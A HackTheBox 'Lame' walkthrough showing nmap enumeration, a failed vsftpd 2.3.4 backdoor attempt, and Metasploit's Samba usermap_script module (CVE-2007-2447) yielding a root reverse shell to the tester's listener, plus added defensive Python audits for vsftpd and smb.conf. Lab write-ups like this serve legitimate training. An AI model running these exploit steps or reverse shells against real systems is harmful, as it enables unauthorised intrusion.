HackTheBox “Lame” (Retired) Walkthrough

A week after completing my OSCP, I was already having withdrawals and signed up for a VIP account on HackTheBox.  A VIP account (roughly $12/month) gives you access to retired machines, as well as a smoother experience overall (less crowded).  HTB has been a good resource for me so I don’t mind sending them money.  : )

HTB rules say not to write walkthroughs for active boxes, so some of the other boxes I’ve done will have to wait until they’re retired.  In the meantime, here’s a walkthrough for one of the easier retired boxes, “Lame”.

Side note:  I’m trying to remove the word “lame” from my vocabulary.

This box has been rated on the easier end by HTB community members:

We start off with nmap to discover the open ports.  We can see that there’s FTP (port 21), SSH (port 22), and two ports relating to Samba (ports 139 and 445).

FTP

One of the first things covered in OSCP was anonymous logins to FTP servers, and FTP was the first thing in the Nmap results, so that’s what I tried first:

Success!  I was able to log in with username “anonymous” and a blank password… but that’s about as far as that idea got me.  I wasn’t able to find or add anything useful.  So, on to the next idea.

If we check ExploitDB for the version of vsftpd (“Very Secure” FTP) running on this machine, which is 2.3.4, we find a match!

So, let’s fire up Metasploit (msfconsole) and try it out:

You can use search vsftpd to find the exploit that ExploitDB is referencing.  Then, use exploit/unix/ftp/vsftpd_234_backdoor and set RHOST 10.10.10.3 to tell Metasploit which machine to target.

msf > use exploit/unix/ftp/vsftpd_234_backdoor

msf exploit(unix/ftp/vsftpd_234_backdoor) > show info

Name: VSFTPD v2.3.4 Backdoor Command Execution
Module: exploit/unix/ftp/vsftpd_234_backdoor
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2011-07-03

Provided by:
hdm <x@hdm.io>
MC <mc@metasploit.com>

Available targets:
Id Name
-- ----
0 Automatic

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 21 yes The target port (TCP)

Payload information:
Space: 2000
Avoid: 0 characters

Description:
This module exploits a malicious backdoor that was added to the
VSFTPD download archive. This backdoor was introduced into the
vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011
according to the most recent information available. This backdoor
was removed on July 3rd 2011.

References:
CVE: Not available
OSVDB (73573)
http://pastebin.com/AetT9sS5
http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html

msf exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 10.10.10.3
RHOST => 10.10.10.3

msf exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

However, it doesn’t work.  Womp womp.  On to the next idea…
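The two FTP findings above (anonymous login permitted, and a vsftpd 2.3.4 banner, the version whose download archive was backdoored per the module description) are the kind of thing a defender wants to catch from their own side before a scan does. The following is an added example, not code from the original post: a small audit that parses an FTP greeting banner and a vsftpd.conf fragment and reports both conditions, then emits a hardened configuration. The banner string is the one the Metasploit run reported; the vsftpd.conf contents are constructed for this example. `anonymous_enable` and `anon_upload_enable` are real vsftpd.conf directives (vsftpd's compiled-in default for `anonymous_enable` is YES, which is why the audit treats an absent key as enabled).

```python
import re

# Constructed sample input for this example.  The banner matches what the
# Metasploit module printed above; the config fragment is made up.
SAMPLE_BANNER = "220 (vsFTPd 2.3.4)"
SAMPLE_VSFTPD_CONF = """\
# vsftpd.conf fragment (constructed for this example)
listen=YES
anonymous_enable=YES
local_enable=YES
write_enable=YES
anon_upload_enable=NO
"""

# The vsftpd 2.3.4 release archive was distributed with a backdoor for a
# short window in 2011 (see the Metasploit module description above).
BACKDOORED_VSFTPD_VERSION = "2.3.4"

# FTP greeting: "220 <text>" where the text contains "vsFTPd <version>".
BANNER_RE = re.compile(r"^220[ -].*?vsFTPd\s+(\d+(?:\.\d+)*)", re.IGNORECASE)


def parse_vsftpd_version(banner):
    """Return the vsftpd version advertised in an FTP greeting, or None."""
    m = BANNER_RE.search(banner.strip())
    return m.group(1) if m else None


def parse_vsftpd_conf(text):
    """Parse vsftpd.conf key=value lines into a dict, skipping comments and blanks."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def audit_vsftpd(banner, conf_text):
    """Return a list of human-readable findings for a vsftpd deployment."""
    findings = []
    if parse_vsftpd_version(banner) == BACKDOORED_VSFTPD_VERSION:
        findings.append(
            "banner advertises vsFTPd 2.3.4: verify the binary was not built "
            "from the backdoored archive and upgrade to a current release"
        )
    conf = parse_vsftpd_conf(conf_text)
    # vsftpd's compiled-in default for anonymous_enable is YES, so a missing
    # key counts as enabled.
    if conf.get("anonymous_enable", "YES").upper() == "YES":
        findings.append(
            "anonymous_enable=YES: anonymous logins permitted; "
            "set anonymous_enable=NO unless the service is meant to be public"
        )
        if conf.get("anon_upload_enable", "NO").upper() == "YES":
            findings.append("anon_upload_enable=YES: anonymous users may upload files")
    return findings


def hardened_conf(conf_text):
    """Return conf_text with anonymous_enable forced to NO (added if absent)."""
    out, seen = [], False
    for line in conf_text.splitlines():
        if re.match(r"\s*anonymous_enable\s*=", line):
            out.append("anonymous_enable=NO")
            seen = True
        else:
            out.append(line)
    if not seen:
        out.append("anonymous_enable=NO")
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for finding in audit_vsftpd(SAMPLE_BANNER, SAMPLE_VSFTPD_CONF):
        print("FINDING:", finding)
    print(hardened_conf(SAMPLE_VSFTPD_CONF))
```

Run against the sample input it reports two findings (the 2.3.4 banner and anonymous login); after `hardened_conf` and a banner from a non-backdoored release it reports none.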

SSH

Next, we look at the SSH port… is there anything exploitable here?  A search of ExploitDB and Metasploit modules (via search openssh) doesn’t turn up anything too promising, so let’s move on to other ideas.  If we didn’t have any untested ports left, I might have dug deeper here, or tried to debug the vsftpd exploit.

Samba

In any case, we move on to the remaining two ports, and the “Samba 3.x – 4.x” software running on them.

Searching ExploitDB for “Samba” returns 5 pages of results (!!).  Similarly, a search of Metasploit modules returns a ton of options:

We can narrow down the list a bit based on version number (so, anything that doesn’t apply to versions “3.x – 4.x” is out).  After that point, we’re still left with a lot of options, so I tend to narrow things down based on the “Rank” in Metasploit, or whether it’s been verified on ExploitDB.

The first “excellent” option, is_known_pipename, says in the Metasploit show info blurb that it requires “valid credentials, a writeable folder in an accessible share, and knowledge of the server-side path of the writeable folder.”  Since we don’t have that… let’s move on to the next option.

The next option is usermap_script, an RCE exploit that does not require any authentication.  We set our RHOST to 10.10.10.3:

Then we run the exploit.  After avoiding the use of Metasploit in the OSCP labs, doing a one-and-done Metasploit RCE module seems a bit like cheating.  That’s probably why this box was marked as easy.

So, it works!  The shell we get back is kind of crappy, so I use python -c 'import pty; pty.spawn("/bin/sh")' to make it nicer.

msf exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP double handler on 10.10.14.8:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 0UfWkKEzrDN9kk2c;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "0UfWkKEzrDN9kk2c\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.8:4444 -> 10.10.10.3:55015) at 2019-05-29 21:07:05 -0400

python -c 'import pty; pty.spawn("/bin/sh")'
sh-3.2# id
id
uid=0(root) gid=0(root)

Luckily for us, we’re already root!

As with all HTB machines, there are two flags we want to get.  One is user.txt in one of the /home/user directories, and the other is root.txt in the /root directory.

After trying the different folders in the /home directory, we find the user flag at /home/makis/user.txt.

Then, grabbing the root flag is easy.  It’s at /root/root.txt.

And that’s it!  I’m planning on doing more walkthroughs in the future and publishing them as the boxes are retired.  🙂

If you’d like to read more about the Samba vulnerability used to exploit this box, check out CVE-2007-2447 (original Samba.org link here).
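For the defensive side of CVE-2007-2447: the vulnerability is in Samba's “username map script” smb.conf option, which hands a user-supplied name to an external script, and it affects Samba 3.0.0 through 3.0.25rc3 (3.0.25 contains the fix). Below is an added example, not code from the post or from the Samba project: an audit that parses an smb.conf fragment, reports whether `username map script` is set in `[global]`, checks a reported Samba version string against the affected range (handling the `rcN` pre-release suffix so that 3.0.25rc3 is still flagged), and produces a copy of the config with the directive removed. The smb.conf contents and the version strings used are constructed for this example.

```python
import re

# Constructed smb.conf fragment (not taken from the box) that sets the
# directive CVE-2007-2447 concerns.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = file server
   username map script = /etc/samba/scripts/mapusers.sh
   security = user

[share]
   path = /srv/share
   read only = no
"""

# Samba 3.0.0 through 3.0.25rc3 are affected; 3.0.25 (final) contains the fix.
# Version keys are (major, minor, patch, prerelease) where prerelease is 0 for
# an rcN build and 1 for the final release, so 3.0.25rc3 sorts below 3.0.25.
FIRST_AFFECTED = (3, 0, 0, 0)
FIXED_VERSION = (3, 0, 25, 1)


def parse_smb_conf(text):
    """Parse smb.conf into {section: {key: value}}; keys are lower-cased and
    internal whitespace collapsed, matching Samba's case-insensitive names."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":          # comment or blank line
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][" ".join(key.lower().split())] = value.strip()
    return sections


def samba_version_key(version):
    """Turn a version string such as '3.0.20' or '3.0.25rc3' into a sortable
    tuple, or return None when no x.y.z version is present."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?", version)
    if not m:
        return None
    major, minor, patch = (int(m.group(i)) for i in (1, 2, 3))
    prerelease = 0 if m.group(4) else 1
    return (major, minor, patch, prerelease)


def version_in_affected_range(version):
    """True when the version falls in 3.0.0 .. 3.0.25rc3 (CVE-2007-2447)."""
    key = samba_version_key(version)
    if key is None:
        return False                             # unknown string: cannot decide
    return FIRST_AFFECTED <= key < FIXED_VERSION


def audit_smb_conf(conf_text, version):
    """Return findings for the 'username map script' exposure."""
    findings = []
    script = parse_smb_conf(conf_text).get("global", {}).get("username map script")
    if script:
        findings.append(f"[global] sets 'username map script = {script}'")
        if version_in_affected_range(version):
            findings.append(
                f"Samba {version} is within the CVE-2007-2447 affected range "
                "(3.0.0 - 3.0.25rc3); upgrade to 3.0.25 or later or remove the directive"
            )
    return findings


def remove_username_map_script(conf_text):
    """Return conf_text with every 'username map script' line dropped."""
    keep = [l for l in conf_text.splitlines()
            if not re.match(r"\s*username\s+map\s+script\s*=", l, re.IGNORECASE)]
    return "\n".join(keep) + "\n"


if __name__ == "__main__":
    for finding in audit_smb_conf(SAMPLE_SMB_CONF, "3.0.20"):
        print("FINDING:", finding)
    print(remove_username_map_script(SAMPLE_SMB_CONF))
```

Note that an unparseable version string is treated as “cannot decide” rather than “not affected”; on a patched 3.0.25 host the audit still reports that the directive is present, since the option remains a place where user-controlled input reaches an external program.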